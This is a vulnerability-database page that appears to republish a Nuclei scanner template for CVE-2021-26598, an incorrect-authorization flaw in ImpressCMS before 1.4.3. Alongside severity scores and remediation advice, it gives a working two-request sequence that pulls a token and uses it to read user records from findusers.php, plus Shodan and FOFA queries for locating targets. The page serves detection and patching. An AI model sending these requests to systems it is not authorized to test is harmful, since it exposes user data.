Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-26598
HistoryApr 03, 2022 - 2:23 a.m.

ImpressCMS <1.4.3 - Incorrect Authorization

2022-04-0302:23:45
ProjectDiscovery
github.com
2

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.7 Medium

AI Score

Confidence

High

0.04 Low

EPSS

Percentile

92.0%

ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.

id: CVE-2021-26598

info:
  name: ImpressCMS <1.4.3 - Incorrect Authorization
  author: gy741,pdteam
  severity: medium
  description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: |
    Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability.
  reference:
    - https://hackerone.com/reports/1081137
    - http://karmainsecurity.com/KIS-2022-03
    - https://github.com/ImpressCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26598
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-26598
    cwe-id: CWE-287
    epss-score: 0.03958
    epss-percentile: 0.92001
    cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: impresscms
    product: impresscms
    shodan-query:
      - http.html:"ImpressCMS"
      - cpe:"cpe:2.3:a:impresscms:impresscms"
      - http.html:"impresscms"
    fofa-query: body="impresscms"
  tags: cve,cve2021,hackerone,impresscms,unauth,cms

http:
  - raw:
      - |
        GET /misc.php?action=showpopups&type=friend HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
      - |
        GET /include/findusers.php?token={{token}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'last_login'
          - 'user_regdate'
          - 'uname'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "REQUEST' value='(.*?)'"
          - 'REQUEST" value="(.*?)"'
        internal: true
# digest: 4a0a00473045022068aef70efa5df942cb79bcdcb0e516cf19fb695d004e8c9b2b74d1bd866a9463022100d85e09ab9ef672758ad61a97a7c16006e886178f4a8d4a48929aa9aa8836b153:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.7 Medium

AI Score

Confidence

High

0.04 Low

EPSS

Percentile

92.0%